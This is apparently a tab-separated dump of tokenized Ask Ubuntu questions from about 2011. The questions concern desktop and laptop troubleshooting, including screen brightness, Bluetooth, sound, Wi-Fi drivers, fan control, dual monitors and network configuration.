libxfixes3 81 ) libxft2 82 ) libxi6 83 ) libxinerama1 84 ) libxrandr2 85 ) libxrender1 86 ) libxt6 87 ) nspluginviewer 88 ) nspluginwrapper 89 ) zlib1g leave the following dependencies unresolved : 90 ) ubuntu-restricted-addons recommends flashplugin-installer 91 ) flashplugin-downloader recommends libasound2-plugins ( > = 1.0.16 ) how do i resolve it ?
90536	dim/dark screen on acer aspire	i do have wubi on my desktop , but that computer is too laggy so i installed wubi on my acer aspire laptop . everything works fine except the screen is too dark . i tried to reinstall wubi but nothing . i need to use the flash-light to see what is on the screen . i tried a program called `` brightness indicator '' . i tried with sudo apt-get install acpi , but nothing . i updated all my packages and still nothing . please some help will be appreciated . note : do not ask me about graphics card , i do not know anything about it > _ <
90539	reconnect to a previously paired bluetooth mouse from command line	i have a bluetooth mouse which controls my laptop . every time i restart the laptop ( several times a day ) , i have to go to the bluetooth applet , find 'bluetooth laser travel mouse ' , and then click 'connect ' . it connects almost instantly after pressing that . is there any way i can do that from the command line , so that i could make it a script and assign it a shortcut key ? ( i have read this question but it specifically pertains to audio . )
90542	my sound has been disabled	i want to enable my sound , which is in disabled state . when i click at sound preferences , it do not respond . what is he possible remedy . i am using ubuntu 10.04
90544	how to stop circular switching of workspaces in xubuntu ?	i started using xubuntu . there is one thing that is annoying me a bit . i use a 2 x 2 layout for workspaces . 1 | 2 -- -- -- - 3 | 4 when i was using gnome , hitting ctrl+alt+up on workspace 1 did not do anyhting , but on xfce , the default is that it switches to workspace 3 . i searched , but could not find a way to stop this . ps : what is this feature called ?
90547	how to configure hardware volume control buttons on a dell inspiron 9400 ?	i run ubuntu 11.10 ( 32 bit ) on a dell inspiron 9400 . per default , however , the multimedia buttons control a weird mix of master , pcm and lfe settings that lead to a jump in volume on the first step and not much difference on subsequent ones . also , the mix between front speakers and subwoofer is poor . by playing around in the alsamixer my guess is that best results would be achieved by setting master ( that apparently controls front speakers ) and lfe ( the subwoofer ) fixed and control only pcm ( that seems to be the master volume ) . is there any clean way to configure this ? or is this the wrong approach to begin with ?
90550	what should i install to fix this error in moovida media center ?	i am trying to watch mts files , but there is an error when i try to play them . it tells me to install subpicture x-pgs , but i ca n't find this in the ubuntu software centre i have installed ubuntu-restricted-extras but i the error persists . the screenshot below shows the error dialog ( in polish ) : http : //ubuntuone.com/25gb5xbwofgqeyvm9awbd8 which roughly translates to : '' unfortunately moovida selected media can reproduce only partially . managed to get the following technical information , which can help in ozwiazaniu problem : installing these codecs should allow playback : subpicture decoder / x-pgs ''
90553	installed google earth wo n't launch	ubuntu 11.10 gnome-shell 64bit after installation google earth does n't start
90554	how to make my flashdisk write-protected so no one can format it ?	can you help me ? i want to make my flashdisk write protected . so no one can format my flashdisk because the data inside the flashdisk is important .
90559	problem with pwmconfig - ca n't control cpu fan	on windows 7 i can set cpu fan speed via asus software that was included on cd . i tried to set cpu fan also on ubuntu and i found this : http : //ubuntumanual.org/posts/127/how-to-control-fan-speed-lm-sensors-in-ubuntu . i installed lm-sensors and i ran sudo sensors-detect ( here 's ending output ) : now follows a summary of the probes i have just done . just press enter to continue : driver `it87 ' : * isa bus , address 0x290 chip `ite it8728f super io sensors ' ( confidence : 9 ) driver `k10temp ' ( autoloaded ) : * chip `amd family 10h thermal sensors ' ( confidence : 9 ) driver `sbs ' : * bus `radeon i2c bit bus 0x92' busdriver `unknown ' , i2c address 0x0b chip `smart battery ' ( confidence : 5 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers it87 sbs # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) no unloading i2c-dev ... ok unloading cpuid ... ok then i run sudo sensors -s ( no output ) and sudo sensors : $ sudo sensors atk0110-acpi-0 adapter : acpi interface vcore voltage : +1.39 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.36 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.13 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +10.41 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 4623 rpm ( min = 600 rpm ) chassis fan speed : 4623 rpm ( min = 600 rpm ) cpu temperature : +49.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +43.0°c ( high = +45.0°c , crit = +75.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +49.5°c ( high = +70.0°c ) ( crit = +83.5°c , hyst = +81.5°c ) radeon-pci-0100 adapter : pci adapter temp1 : +67.5°c finally i ran sudo pwmconfig : $ sudo pwmconfig # pwmconfig revision 5857 ( 2010-08-22 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed what is going on ? why pwmconfig does not detect modules ? my /etc/modules file : $ cat /etc/modules # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp rtc # generated by sensors-detect on mon dec 26 10:35:41 2011 # chip drivers it87 sbs my system and hardware info : $ inxi -f system : host : area51 kernel : 3.0.0-15-generic x86_64 ( 64 bit ) desktop gnome distro : ubuntu 11.10 oneiric machine : mobo : asustek model : m5a78l-m/usb3 version : rev x.0x bios : american megatrends version : 0411 date : 08/11/2011 cpu : quad core amd phenom ii x4 955 ( -mcp- ) cache : 2048 kb flags : ( lm nx sse sse2 sse3 sse4a svm ) clock speeds : 1 : 3200.00 mhz 2 : 3200.00 mhz 3 : 3200.00 mhz 4 : 3200.00 mhz graphics : card : ati barts pro [ ati radeon hd 6800 series ] x.org : 1.10.4 drivers : ati , radeon ( unloaded : vesa , fbdev ) resolution : 1440x900 @ 59.9hz glx renderer : gallium 0.4 on amd barts glx version : 2.1 mesa 7.11 audio : card-1 : ati sbx00 azalia ( intel hda ) driver : hda intel sound : alsa ver : 1.0.24 card-2 : ati barts hdmi audio [ radeon hd 6800 series ] driver : hda intel network : card : realtek rtl8111/8168b pci express gigabit ethernet controller driver : r8168 if : eth1 state : up speed : 100 mbps duplex : full mac : 54:04 : a6:15:11:77 drives : hdd total size : 484.3gb ( 6.4 % used ) 1 : /dev/sda samsung_sp1654n 160.0gb 2 : /dev/sdb samsung_hm320ji 320.1gb 3 : usb /dev/sdc flash_disk 4.2gb partition : id : / size : 19g used : 5.2g ( 30 % ) fs : ext4 id : /home size : 127g used : 23g ( 19 % ) fs : ext4 id : swap-1 size : 2.04gb used : 0.00gb ( 0 % ) fs : swap sensors : system temperatures : cpu : 49.0c mobo : 43.0c gpu : 67.5 fan speeds ( in rpm ) : cpu : 4560 sys-1 : 4560 info : processes : 216 uptime : 22 min memory : 2895.7/8000.2mb client : shell inxi : 1.7.27 thank you for any answer .
90562	my laptop battery does not charge	i am using a hp pavilion and ubuntu 11.10 . i have been using ubuntu for about a year . recently ( in nov or there about ) , i noticed my battery never charges fully no matter how long it has been plugged in . i thought it was a problem with the power pack . however , after changing it , the problem is still persisting . i upgraded to 11.10 form 11.04 at about the same time so i do not know if this is a software or hardware issue . how do i solve this ? this problem has been written about in various forms laptop battery not charging after update ? . please help me or find someone that can .
90567	quickly launch any app in kde with a shortcut	how can you quickly launch an app with an assigned shortcut in kde ? systemsettings - > shortcuts and gestures - > custom shortcuts - > edit - > new
90568	apply compressor effect to new podcasts automatically ?	i want to greatly reduce the dynamic range of certain audio podcasts automatically . the effect needs to be applied to all episodes of some feeds , other feeds do n't need this and can be ignored . i 'd like to have the compression applied to new episodes right after they are downloaded . is this possible ? i currently accomplish this by using gpodder to grab episodes , then manually apply the compression with audacity . these tools are fine but i 'm open to trying something else , too .
90570	i need a netspeed-applet like indicator	i have a hybrid ( variable speed ) mobile broadband connection that keeps changing the download/upload speeds based on location and time-of-day . so , the netspeed-applet in the previous versions of ubuntu panel was very useful to get a live feel while running any internet based application . but there does n't seem to be anything to indicate the broadband connection speed in the ubuntu 11.10 unity panel . can anyone please guide me to get this type of indicator ? and , no , gnome-panel or the classic-fallback that many people suggest is not a solution ! i am very comfortable with unity as i can see where this is leading - a tablet friendly ubuntu !
90571	how can i update application ?	i had some problems with ubuntu 11.10 ( my pc is too old for it ) and decided to downgrade to 10.04 lts . everything is fine except that all programs that are installed are n't up to date . for instance rhythmbox says that databese was created by newer version of the program and ca n't read it . update manager seems to find only system updates ... how do i update programs ( rhythmbox , empathy etc ) after downgrade ?
90573	ubuntu natty froze when copying files to my ext4 external drive , files can be recovered if corrupted ?	i heard that ext4 was more stable in these conditions , but how can i be sure that my files did n't get corrupted in the process ? i heard that because of ext4 journaling file that the files are n't very easy to get corrupted as compared to ntfs ( which is what i switched from ) . anyone to help me out with any of this ?
90575	is linux virtualbox images legal to distribute ?	i have website with adsense . can i share linux distro 's virtualbox images with users ? is this legal ? will it affect on my adsense account ?
90588	how do i find unity lenses ?	is there a way in ubuntu to find community written lenses ? something similar to https : //extensions.gnome.org/ . the ubuntu software center would be a good place in ubuntu !
90589	how to connect to internet with nokia x2-01	i wan na connect my ubuntu pc to internet using my nokia x2-01 but i cant do it like other phones it just detect the phone and display disconnected now you are offline i tried gnome pp also but invain any solution ?
90594	rsync between two directories	currently i use rsync -avh -- stats -- progress dir1 ( source ) say dir2 ( destination ) ... say i have 10 files in dir1 and i have copied using the above command to dir2 all 10 files . say now i have added another 5 files to dir1 and i want only the new 5 files and any updates to get copied to dir2 when i run rsync again . can i use the above command and switches or should i modify it ?
90595	how do i share a wireless internet connection via ethernet with an xbox 360 ?	i am trying to share my wireless connection with my xbox 360 ( which does not have a wireless adapter ) via ethernet cable . i thought there once was a sharing option in network manager ( it has been some time since i 've last used ubuntu ) but it appears to be conveniently removed . i 've looked and looked across endless results in google on the subject and they all seem to point to using this missing option . since they seem to have broken ubuntu 11.10 in so many ways , how can i configure this manually ? i 've tried switching to xfce but it still uses the same application when i go to edit connections . update set it to share as per below . it 's not able to get a connection . the xbox connection test dies before the network icon . also , to make it more interesting , the wireless connection disconnects and reconnects in rapid succession as long as sharing is enabled .
90596	is there a way to make the top bar in chrome transparent ?	i have my top panel transparent . it looks nice , except for when i browse the internet , the black bar along the top of chrome , which looks pretty against the non-transparent panel , sticks out like a sore thumb against the top panel . here is a picture : is there some way i can make the top bar in chrome transparent too , so that they both look nice together ? thanks for any help in advance .
90607	ubuntu software centre is loading a blank window	this issue has reared its head just today . the ubuntu software centre seems to be broken it loads up a blank window with the title `` ubuntu software centre '' but does n't do anything else after that . here is the console output : rymate @ rymate-aspire-5551 : ~ $ software-center 2011-12-26 16:21:10,618 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 rymate @ rymate-aspire-5551 : ~ $ anything i can do to fix ? or am i gon na have to use synaptic package manager to install stuff .
90610	brightness does n't work on an acer aspire 4750	i used ubuntu 11.10 on acer aspire 4750 with intel hd graphics . when i made it up looks like linux mint 12 , the graphics card was detected as intel sandy bridge x86/mm2 . but i still got problem with the brightness . it did n't work , as i had to try some tricks like editing the grub , but it still did n't work . please help me
90612	iomega 335 gb usb drive not being recognized	i have a 335g iomega usb hard drive model mdhdu that my ubuntu laptop does not recognize . it works well on win7 & is ntfs formatted . any ideas on how to get ubuntu to recognize it ?
90613	`` dpkg was interrupted error '' when installing any application	i have ubuntu 11.10 and when i run any package management command in terminal i get this message e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a' to correct the problem . what is the problem and how can i solve it ?
90619	browsing files via bluetooth does n't work	how can i browse files using bluetooth in ubuntu 11.10 ? i get paired perfectly , but i ca n't browse files . nothing happens . i asked about it before . people recommended install blueman . i did but blueman did n't work either . bluetooth worked perfectly in ubuntu 11.04 . the same cell phone i use today i could get paired and browse files . 20 minutes ago i was using ubuntu 11.04 live cd and used the bluetooth and was perfectly ( i get paired and browse files ) . i took a screenshot to show you . i ca n't believe that in a old system ( 11.04 ) was perfectly but the evolution ( 11.10 ) is a regression about bluetooth . why ? please , how can i solve this problem ( browse files ) on ubuntu 11.10 ?
90624	can not find /usr/bin/ in nautilus	i 'm trying to get the program `` desktop drapes '' to run on startup , and so far the only guide that 's gotten me anywhere is this one : http : //ubuntuforums.org/showthread.php ? p=8810911 # post8810911 things progress smoothly until i enter gksudo nautilus into the terminal . according to the guide , from here i should be able to /usr/bin and change the properties of `` drapestart . '' however , in the root folder i find only a desktop icon that leads to an empty menu . i 've entered gksudo nautilus while cd 'd into /usr/bin and from [ username ] @ [ username ] -desktop : ~ $ , and the result is the same . any idea what i 'm doing wrong ? thank you for taking the time out to read this . : )
90629	how do i setup crossfirex ?	using ubuntu 11.10 have 3 amd hd6970's using ati catalyst 11.12 . obviously only one card is detected . how do i enable the other 2 so i can have 3way crossfirex ?
90630	how do i completely uninstall tor ? ( and then install it ? )	first of all , i 'm really new to ubuntu and tor . i 've been trying to get tor working for days now and i ca n't seem to do it . right now i 'm trying to remove all remnants of tor/vidalia/polipo from my computer so i can start fresh again . i 've uninstalled vidalia and tor from the software center , but there 's still two folders in the /etc directory ( privoxy and polipo ) . does this mean that these programs are still installed ? if not , can i just delete the directory and how would i do that ? i 'm using ubuntu 11.04 .
90631	moving file to ntfs volume	i have a nfts disk that i use to keep movies and music : on ubuntu , i created a folder onto this disk and moved a video file from my ext4 disk to that folder . turned out i could not access to the folder on windows 7 . is this some kind of permission-related problem ? can sombody help to set the disk in order to receive and run files from either os ?
90633	ubuntu 11.10 not displaying any open applications , when running in virtualbox	i have managed to get 3d acceleration to work when running ubuntu 11,10 in virtualbox , however , when ubuntu loads the unity display , any application i launch seems to be hidden . the open apps are running , but not being displayed . all works fine when in 2d , so it is something to do with the 3d acceleration . wondered if anyone had the same issue ... host : os x lion guest : ubuntu 11.10 when i resize the virtualbox window , the applications flashes on to the screen , but then disappears again . when i right click , i can create a document , the icon is shown on the desktop , but when i open it , again it is there but does not display . additional : virtualbox settings : video memory : 128mb 3d acceleration enabled base memory 1512mb 1cpu ( uncapped ) virtualbox version 4.1.8 r75467 installed on guest : xserver-xorg-video-intel xserver-xorg-video-vmware virtualbox-guest-dkms virtualbox-guest-utils virtualbox-guest-x11 -virtualbox-ose-guest-x11 all versions 4.1.2-dsfg-1ubuntu1 host info : processor 2.53 ghz intel core i5 memory 8 gb 1067 mhz ddr3 graphics nvidia geforce gt 330m 512 mb software mac os x lion 10.7.2 ( 11c74 ) extension pack : oracle_vm_virtualbox_extension_pack-4.1.8-75467.vbox-extpack unity 3d displays ok , but when any program is opened it is not displayed , however is running , as though it is behind the desktop . if i resize the virtualbox window the running program flashes on the screen and then disappears again if i right click on the desktop after opening a program , eg nautilus , the nautilus right click menu appears . so the program is there , and operational , but is not being displayed . has anyone got unity working in virtualbox or vmware fusion , if so what versions of virtual** software ? reported bug here : https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/909534
90634	ca n't burn cds/dvds	i own a sony vaio vpcea35fl laptop , and i 'm having problems burning cds/dvds . it seems that the burn process itself works , but once the disc is done , it ca n't be played . i tried brasero and k3b , both without success . sometimes the toc can be read without a problem , but the data never is readable . also , when i try to play video dvds , the dvd drive becomes noisier and usually the video stops for a few seconds . this is a weird behavior , since a couple days ago i was using another o.s . and it worked just fine . i think that this was n't a problem using natty . what can i do ?
90640	screen brightness on new macbook pro 8,3 ?	2011 8,3 macbook pro running 64bit 11.10 . the screen brightness keys seem to actually do things , but nothing actually changes with regard to actual laptop screen brightness . ( see this video . ubuntu can sense when the buttons are pressed , but nothing actually happens with screen brightness . i know you would n't be able to see it if it did work , but it does n't . ) is this a known issue ? how can i adjust the screen brightness on my macbook pro ? i know i can do something like this in the amd/ati fglrx configuration software , but it actually just adjusts the output picture , not the physical laptop 's screen brightness . what can i do ?
90643	windows dynamic disk not reading in ubuntu	while using windows i changed my hard disk partitions from `` logical disk '' to `` dynamic disk '' ... .. then i installed ubuntu in c drive . when i opened ubuntu the contents of c : drive are shown but i am unable to view the contents of d drive or e drive ( both of them are dynamic ) . please help.. i tried reinstalling ubuntu quite a number of times which did n't help . also the windows disk partition manager is unable to change the drives back to logical drive.. what should i do ? ?
90654	what ( if anything ) is the ubuntu equivalent of network-scripts ?	i 've just made the switch from red hat enterprise linux to ubuntu server , and need to do network configuration with static ip addresses , multiple ethernet interfaces , channel bonding for redundancy , a bridge for vms , etc . in rhel , i did this by writing configuration files in /etc/sysconfig/network-scripts . is there a similar file or directory in ubuntu where you can configure all network interfaces ? if so , where can i find documentation for it ? if not , how do i do network configuration beyond the basics ? ( i 've seen mention of /etc/network/interfaces , but i 'm not sure it does what i 'm looking for . ) thanks ! update : thanks to man interfaces , man bridge-utils-interfaces , and the ubuntu community documentation page for bonding , i 've mostly figured out what i need . the one thing i 'm still not sure of is how to put a bridge on top of a bonded interface . here 's the relevant part of my interfaces file : auto br0 iface br0 inet static address 10.1.254.101 netmask 255.255.255.0 network 10.1.254.0 broadcast 10.1.254.255 gateway 10.1.254.50 dns-nameservers 10.1.254.252 bridge_ports bond0 bridge_stp off iface bond0 inet manual bond-slaves eth0 eth1 bond_mode balance-rr bond_miimon 100 is this correct ?
90658	wireless with a ar242x / ar542x atheros wireless adapter does n't work on an acer aspire one zg8	i 'm asking that how to get wlan on ? when i click connections ( or something ) -button , then i 'm trying to get wirless connection on , but it would n't go on , so could you help me guys , please ? more information . lsmod code : module size used by ppp_deflate 12878 0 zlib_deflate 26622 1 ppp_deflate bsd_comp 12842 0 ppp_async 17307 1 crc_ccitt 12595 1 ppp_async parport_pc 32114 0 ppdev 12849 0 joydev 17393 0 rfcomm 38408 0 bnep 17923 2 option 25463 2 usb_wwan 19779 1 option arc4 12473 2 snd_hda_codec_realtek 254125 1 usbserial 37203 7 option , usb_wwan snd_hda_intel 24262 2 hso 33389 0 snd_hda_codec 91754 2 snd_hda_codec_realtek , snd_hda_intel ath5k 145100 0 snd_hwdep 13276 1 snd_hda_codec uvcvideo 67271 0 videodev 85626 1 uvcvideo snd_pcm 80435 2 snd_hda_intel , snd_hda_codec ath 19387 1 ath5k mac80211 393459 1 ath5k btusb 18160 0 psmouse 73673 0 serio_raw 12990 0 bluetooth 148839 11 bnep , rfcomm , btusb snd_seq_midi 13132 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq i915 505159 3 cfg80211 172392 3 ath5k , ath , mac80211 snd 55902 13 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device binfmt_misc 17292 1 drm_kms_helper 32889 1 i915 drm 192194 4 i915 , drm_kms_helper soundcore 12600 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm i2c_algo_bit 13199 1 i915 video 18908 1 i915 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usb_storage 44173 0 uas 17699 0 ahci 21634 2 libahci 25727 1 ahci atl1e 32809 0 lspci code : 00:00.0 host bridge : intel corporation mobile 945gme express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gme express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7 family ) sata ahci controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : atheros communications ar8121/ar8113/ar8114 gigabit or fast ethernet ( rev b0 ) 02:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) sudo lshw -class network code : *-network description : ethernet interface product : ar8121/ar8113/ar8114 gigabit or fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : b0 serial : 00:23:8b : a1 : e7:2b capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1e driverversion=1.0.0.7-napi firmware=l1e latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory:55200000-5523ffff ioport:3000 ( size=128 ) *-network disabled description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:24:2b : e3:0f:72 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.0.0-14-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:18 memory:54100000-5410ffff lsusb code : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 064e : a102 suyin corp. acer/lenovo webcam [ cn0316 ] bus 001 device 026 : id 0af0:7601 option globetrotter mo40x 3g modem ( gtm 382 ) bus 001 device 024 : id 12d1:1506 huawei technologies co. , ltd. sudo rfkill list code : 2 : phy0 : wireless lan soft blocked : no hard blocked : yes 8 : hso-7 : wireless wan soft blocked : no hard blocked : no is that information enough ?
90659	is it possible to use a usb guitar interface meant for asio on windows with ubuntu ?	i have the peavey xport usb guitar interface . it comes with an installation cd to set it up with asio drivers on windows . would it be possible to use the interface on ubuntu so that i could make use of programs such as rakarrack ?
90669	touchpad raw input	i am researching the extra possibilities for using a laptop touchpad as an input device apart from mouse movement similar to this one : http : //softarchive.net/blogs/tech-weki/number_pad_film_adds_a_number_pad_to_your_laptop.895113.html how do i hook and listen to raw data coming from touchpad driver ?
90671	at present which is the best choice for a ubuntu graphics card , amd or nvidia ?	i 've been using nvidia cards in ubuntu boxes for years . the closed source drivers have been great and i 've even found my way around the nvidia-settings program when i 've needed to . i 'm now in the market for a new graphics card . is there ( at present ) any reason to entertain switching to an ati card ?
90673	how to decrypt a windows folder in ubuntu	[ question brought here from the security section ] is there any easy way i can decrypt a folder that has been encrypted with windows 7 ? i am using ubuntu 11.10 to decrypt the folder .
90686	i need help installing a tar.gz file	i 've got flash 11.2 beta in a tar.gz file . i 'm new to linux and i do n't know what i 'm doing . how can i install it ?
90693	why ca n't i download anything from the internet ?	every time i get to downloads and it finished , i click open file and archive manager pops up and says that an error occurred while opening files . questions : what is archive manager ? how can i fix archive manager ? can i replace archive manager ? why does n't auto run show up ? does archive manager have anything to do with auto run ?
90695	since i 've downloaded ubuntu one my ubuntu software centre icon is gone	since i downloaded ubuntu one my side tab for ubuntu software center is missing .
90698	firefox rendering the wrong thing when i scroll	sometimes when i scroll in firefox , i will a block of the same content from another portion of the page rendered where it should n't be , almost like the browser did n't scroll properly . i suspect that this has something to do with my video driver , and some stability issues i 've been experiencing . i 'm using the recommended driver , 280.13 .
90699	patching kernel 3.1.5	i recently installed kernel 3.1.5 ( upgraded from kernel 3.1.4 ) and now my wireless doesnt work . after some investigating , i found that the iwlagn module no longer exists . apparently this is a documented problem with this kernel . so , my questions are : 1 ) can i apply the fedora community patch ( it has already been solved there ) for this kernel to my ubuntu kernel ? 2 ) if not , where could i apply for a patch to this problem ? would it be easier to compile the kernel myself and make some small change ? 3 ) i asked this on the forum already , but didnt get a response : why are there so many kernels listed and could it be assumed that each increase in version number results in a more efficient or updated kernel ? 4 ) will i be able to update this kernel through a ppa or will i need to manually apply patches and updates ? my laptop uses ubuntu 11.10 , an intel i5 processor and hd 3000 graphics w/ intel 6150 centrino n wireless card . the reason i am updating the kernel is because my resume/suspend function doesnt work ( backlight never turns back on ) , power consumption is terrible , and taking advantage of the intel graphics appears to require a more updated kernel . finally , why does the official update only include kernel 3.0.* ? i noticed that kernel 3.1.5 was labeled as the '' precise '' os . are these kernels optimized for ubuntu 11 vs ubuntu 12 ?
90700	black screen after installation with wubi	i tried to dual boot windows 7 and ubuntu by wubi , but after rebooting , i choose to load ubuntu and i get a purple screen for about 5 seconds , then it turns black .
90702	how do i get sound to work in ubuntu 11.10	sound used to work in 10.4 but after an upgrade to 11.10 it wo n't work
90703	how to make multiple monitors show same screen but with different resolutions	is it possible to have 2 or more monitors show the same screen , for example the same desktop but with different resolutions . like the clone option in nvidia or the mirror option using the display settings in ubuntu but instead of showing the same output with the same resolution , they both show the same output using a resolution that is native for each monitor connected ( independent resolution sizes ) . in my case if i have a netbook that has max resolution of 1360x768 and a tv that has 1280x1024 , the would both show the same desktop but each with their own resolution that is compatible for each device . this would help in trying to find a resolution that works on both monitors and in cases like a mini netbook and a huge tv it would solve issues like having max 800x600 in one monitor and min 1024x768 in the other . in the case i tested i was using an hdmi cable but this question also involves vga and any other connection . i have 3 tests scenarios for this : scenario 1 - laptop hp dv6000 ( intel integrated video ) with 1360x760 connected to a samsung led 42 tv that has 1280x900 . scenario 2 - laptop eee with 1024x600 ( intel integrated video ) connected to sony lcd tv that supports 1280x900 . scenario 3 - intel desktop with nvidia 440 gt with hdmi connected to soneview 32 ' tv that supports 1920x1080 and vga connected to an epson video beam that supports 1280x1024 max . in this 3 scenarios i need to be able to show the same desktop and same views but on different resolutions for each output device . update : tested with xubuntu and the way it handles multiple monitors is precisely what i am asking . the ability to handle the resolution of different monitors showing the same thing .
90706	slow on browsing web , but normal when using apt-get	i have a problem with my fresh instalation of ubuntu 11.10 . the problem happen when i start up my browser and accessing website such google , askubuntu.com , facebook and other sites . frustate on the situation i try watch the progress in system monitor . the result from monitor shows that there is no data transfer when i try to accessing the page . firstly , i assume that it is the trouble from my isp or my home connection . but it is not . when i try pinging google it shows transaction between my computer and the network but still null from browser . then i tried to test the aptitude and it was work fine but still the browser wo n't recieve any packet from the internet . here is the detail of my tools : laptop : toshiba satellite e205 ( network card atheros ) operating system : ubuntu 11.04 dual booted with win7 browser : mozilla firefox comes up with the ubuntu 11.10 installation chrome : last version ( just yesterday install it ) thank you before : ) [ this question posted via win ]
90707	laptop display `` unknown '' and ca n't detect external displays	i recently installed ubuntu 11.10 on my samsung laptop . on unity , i ca n't even know what graphics i have ( in system settings ) . however , after i switched to gnome , i know can see my graphics : geforce gt 330m/pci/sse2 . but my main issue remains : if i go under system settings - > displays , my display is listed as `` unknown '' and i ca n't detect my external display . during the ubuntu installation , my external screen worked ( it was a clone of my laptops screen ) . i tried to update my driver in system settings - > additional driver ( yes , i then rebooted ) , i tried to update it manually within the console ( sudo apt-get install nvidia-current ) , but still nothing . edit : on another topic i 've seen someone asking to run a ddcprobe to retreive more infos . here is what i get : mmap /dev/zero : operation not permitted vesa bios extensions not detected .
90709	desktop refuses to spread across dual monitors	set up dual monitors on my friends fresh install of ubuntu 11.10 monitor 1 = 20 '' is first ( original screen ) monitor 2 = 15 '' flat screen . these screens work fine cloned but when i try to spread desktop across the 2 monitors the ati utility exits without error not changing anything and the ubuntu utility produces an out of range message saying `` requested position/size for crtc 147 is outside the allowed limit ; position ( 1024,0 ) , size ( 1024,768 ) , maximum ( 1680,1680 ) '' this makes no sense at all and would make a fine micro $ loth error message indeed ! or am i just dense ?
90711	web browsing extremely slow sometimes using firefox or chromium	web browsing slow randomly since doing a clean load of 11.10 . using an hp pavillion dv6000 . tried firefox , chromium , unity , unity 2d , gnome . no difference . sometimes it flies , sometimes it takes 3-5 minutes to load the google home page or any other page including yours . it always says `` waiting for ( google.com or whatever ) ''
90712	unable to connect to wifi on a dell inspiron e1505	i am using a dell inspiron e1505 laptop . i can connect with a wired connection but it does n't pick up the wifi or i cant enable it at all . it 's rather frustrating . any help ?
90719	how do i prevent my computer from going straight to windows ?	i bought a lenovo b570 laptop today , and one of the first things i did was burn an oneiric livecd and install it . this was more trouble than i expected . it did n't automatically load to the cd when i restarted ; it just booted windows 7 like before . i had to press f12 at boot and use a very unintuitive menu to get to the livecd . so now i 've installed ubuntu and restarted , but once again it 's just booting to windows like nothing happened instead of showing the familiar grub menu . what 's going on here ? ( this is my first windows 7 computer ; my previous one had vista dual-booted . ) edit : i should clarify that i ca n't load ubuntu at all . or at least i do n't know how to .
